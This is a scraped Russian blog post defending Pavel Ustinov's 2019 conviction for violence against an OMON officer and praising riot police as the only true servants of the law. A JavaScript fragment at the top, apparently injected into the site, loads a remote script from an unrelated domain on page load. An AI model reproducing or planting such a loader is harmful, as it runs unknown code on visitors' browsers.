, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Нельзя нападать на тех, кто служит Закону

19 Сен

16 сентября суд приговорил Павла Устинова к 3,5 годам колонии, признав его виновным в применении насилия к бойцу ОМОНа в ходе несогласованной акции 3 августа в Москве.

Если есть основания считать приговор неправосудным, надо обжаловать его в вышестоящих инстанциях, а также используя СМИ, аргументированно доказывать, что правосудие по данному делу отсутствовало.

На примере дела Ивана Голунова россияне убедились в том, что имело место фальсификация. Лишились своих должностей генералы.

Но вместо этого поднялся дилетантский шум  лицедеев  и театральных деятелей,  которые про беззакония и несправедливость в обществе должны рассказывать и  показывать своим умением в театрах, которых в России появилось великое множество. Их   лицедейство щедро оплачивается из бюджетных средств.

Бойцы ОМОНа, это единственные люди в правоохранительных органах, которые «Служат Закону».

Все остальные только клянутся  «свято соблюдать Конституцию Российской Федерации и законы».

Даже гарант Конституции Владимир Путин, четырежды клялся уважать и охранять права и свободы россиян, соблюдать и защищать Конституцию России, верно служить народу».

О том, что клятвенные обещания не всегда исполняются, свидетельствуют факты того, что Путин подписывал и обнародовал законы, которые Конституционный Суд РФ признавал противоречащими Конституции России.

Как практикующий более 45 лет юрист, могу утверждать, что даже окончившие юридические учебные заведения, не способны  «свято соблюдать Конституцию Российской Федерации и законы»

Из тридцати, окончивших вместе со мной слушателей, в 1974 году Высшую следственную школу МВД СССР, не более десятка смогли «свято соблюдать Конституцию Российской Федерации и законы».

Более половины не выдержали нагрузок по работе.

Бойцы ОМОНа 16 сентября доказали, что они  «Служат Закону», несмотря на все издевательства и оскорбления в их адрес, они  старались  не допустить беспорядков, которые пытались совершить те, кто организовал и привёл людей на несогласованный митинг.

На человека в форме государственного служащего, нельзя нападать. Он не является защитником тех, кто осуществляет государственную власть. Он  является защитником Закона, которым установлены правила поведения в обществе. Именно это и подтвердил суд, назначив Устинову  3,5 года лишения свободы.

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.